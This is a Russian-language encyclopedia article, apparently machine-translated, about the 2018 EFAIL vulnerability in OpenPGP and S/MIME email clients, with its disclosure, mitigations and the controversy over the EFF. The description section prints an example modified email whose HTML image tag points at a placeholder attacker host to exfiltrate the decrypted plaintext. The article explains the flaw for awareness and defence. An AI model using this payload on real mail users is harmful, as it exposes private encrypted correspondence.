EFAIL - Википедия - EFAIL

Логотип группы, сообщившей об уязвимости, метафорически представляющий открытый текст, выходящий из «конверта» шифрования.

Efail, также написано EFAIL, это дыра в безопасности в электронное письмо системы, с помощью которых контент может передаваться в зашифрованный форма. Этот пробел позволяет злоумышленникам получить доступ к расшифрованному содержимому электронного письма, если оно содержит активный контент подобно HTML[1] или же JavaScript, или если загрузка внешний контент был включен в клиенте. Затронутые почтовые клиенты включают Gmail, Apple Mail, и Microsoft Outlook.[1]

Два связанных Распространенные уязвимости и подверженности Идентификаторы, CVE -2017-17688 и CVE-2017-17689, были выпущены. Пробел в системе безопасности был обнародован 13 мая 2018 года Дамианом Поддебняком, Кристианом Дресеном, Йенсом Мюллером, Фабианом Изингом, Себастьяном Шинзелем, Саймоном Фридбергером, Юраем Соморовски и Йоргом Швенком в рамках участия в 27-м заседании. USENIX Симпозиум по безопасности, Балтимор, август 2018 г.

В результате уязвимости содержимое атакованного зашифрованного сообщения электронной почты может быть передано злоумышленнику в виде обычного текста с помощью уязвимого почтового клиента. Используемые ключи шифрования не разглашаются.

Описание

Пробел в безопасности касается многих распространенных почтовых программ при использовании с шифрование электронной почты системы OpenPGP и S / MIME. Злоумышленнику необходим доступ к атакованному сообщению электронной почты в его зашифрованном виде, а также возможность отправить электронное письмо хотя бы одному обычному получателю этого исходного письма. Чтобы использовать брешь в системе безопасности, злоумышленник изменяет зашифрованное сообщение электронной почты, в результате чего программа электронной почты получателя отправляет злоумышленнику расшифрованное содержимое сообщения электронной почты.

Чтобы получить доступ к расшифрованному содержимому зашифрованного электронного письма, злоумышленник изменяет электронное письмо, которое будет атаковано, так, чтобы оно содержало текст, подготовленный злоумышленником определенным образом. Затем злоумышленник отправляет измененное электронное письмо одному из обычных получателей.

Злоумышленник вставляет дополнительный текст до и после зашифрованного текста в зашифрованное электронное письмо, тем самым изменяя сообщение таким образом, что создается составное / смешанное (MIME) сообщение, и зашифрованная часть сообщения отображается вместе с метками ограничения сообщения MIME как значение параметра тега HTML.

Пример измененного письма S / MIME:

[...]Тип содержимого:составной/смешанный;граница=«ГРАНИЦА»[...]- ГРАНИЦАТип содержимого:текст/html<img src="http: //attacker.chosen.url/- ГРАНИЦАТип содержимого: приложение / pkcs7-mime;  s-mime-типизированный конверт-данныеКодирование передачи содержимого: base64ЗАШИФРОВАННОЕ СООБЩЕНИЕШифрованное сообщениеЗашифрованное сообщениеЗашифрованное сообщение- ГРАНИЦАТип содержимого: текст / html">- ГРАНИЦА ...

Почтовый клиент сначала разбивает составное сообщение на отдельные части, используя - ГРАНИЦА тег, а затем расшифровывает зашифрованные части. Затем он повторно собирает составное сообщение и получает сообщение следующим образом:

[...]Тип содержимого:составной/смешанный;граница=«ГРАНИЦА»[...]- ГРАНИЦАТип содержимого:текст/html<img src="http: //attacker.chosen.url/СЕКРЕТНОЕ СООБЩЕНИЕ>- ГРАНИЦА ...

Это сообщение теперь содержит расшифрованное содержимое электронного письма в src = атрибут <img> тег и передается почтовой программой как URL-адрес веб-серверу attacker.chosen.url контролируется злоумышленником, когда это содержимое запрашивается. Теперь злоумышленник может получить содержимое зашифрованного сообщения из журналов своего веб-сервера.

В варианте атаки злоумышленник использует уязвимость в CBC (S / MIME) и CFB (OpenPGP) режимы работы используемых алгоритмов шифрования. Это позволяет ему изменить зашифрованный текст вставив гаджеты. Как побочный эффект этой манипуляции, исходный текст становится неразборчивым. Если это было известно, злоумышленник может исправить это, вставив дополнительные гаджеты. Злоумышленник может скрыть неизвестный простой текст, вставив определенные HTML-теги. Результатом является сообщение с аналогичной структурой, как описано выше.

Смягчения

Поскольку уязвимость направлена ​​против содержимого электронного письма, а не против получателя, необходимо, чтобы все получатели реализовали контрмеры. К ним относятся:

  • Отключить активный контент, например HTML или же JavaScript при просмотре писем.
  • Запретить автоматическую перезагрузку внешнего содержимого, например изображений.

В какой степени даже отправители зашифрованного контента могут снизить уязвимость, например электронными подписями или ограничением подмножества форматов MIME окончательно не выяснено.

Критика

Объявив об уязвимости системы безопасности 13 мая 2018 г., Фонд электронных рубежей (EFF) рекомендовал прекратить использование каких-либо плагинов PGP в почтовых программах, даже если уязвимость напрямую связана не с PGP, а с конфигурацией почтовой программы.[2][3] Скоординированная публикация изначально была запланирована на 15 мая. EFF подвергся критике за игнорирование этого со стороны различных сторон.[4][5][6][7][8]

Вследствие этого Роберт Хансен рекомендовал создать закрытую группу или список рассылки, чтобы лучше координировать публикацию будущих проблем безопасности. Тем не менее он видел EFF и его директора. Дэнни О'Брайен как лучший субъект для администрирования такой «Группы раскрытия информации OpenPGP».[9]

Рекомендации

  1. ^ а б «Десятилетние недостатки Efail могут привести к утечке открытого текста сообщений электронной почты, зашифрованных с помощью PGP и S / MIME». arstechnica.com.
  2. ^ "EFF в Твиттере". Twitter. Фонд электронных рубежей (ЭФФ). 2018-05-13. Получено 2018-05-17. Чтобы защитить себя, EFF настоятельно рекомендует удалить или отключить плагин электронной почты PGP.
  3. ^ О'Брайен, Дэнни; Гебхарт, Джинни (13.05.2018), Вниманию пользователей PGP: новые уязвимости требуют немедленных действий, Фонд электронных рубежей (EFF), получено 2018-05-17
  4. ^ "Комментарий: Efail ist ein EFFail". Heise онлайн (на немецком). 2018-05-16. Получено 2018-05-17.
  5. ^ "Enigmail-Chefentwickler im Interview: Efail-Veröffentlichung war" unüberlegt"". высокая безопасность (на немецком). 2018-05-15. Получено 2018-05-17.
  6. ^ Кох, Вернер (2018-05-14). «Efail или OpenPGP безопаснее, чем S / MIME». gnupg-пользователи. Получено 2018-05-17.
  7. ^ Грин, Мэтью (17.05.2018). "Было ли раскрытие Efail ужасно провальным?". Несколько мыслей о криптографической инженерии. Получено 2018-05-17.
  8. ^ "Хэштег #EFFail auf Twitter" (на немецком). Получено 2018-05-17.
  9. ^ Хансен, Роберт (20 мая 2018 г.). "Efail: Postmortem". medium.com. Получено 2018-05-21.

дальнейшее чтение

внешняя ссылка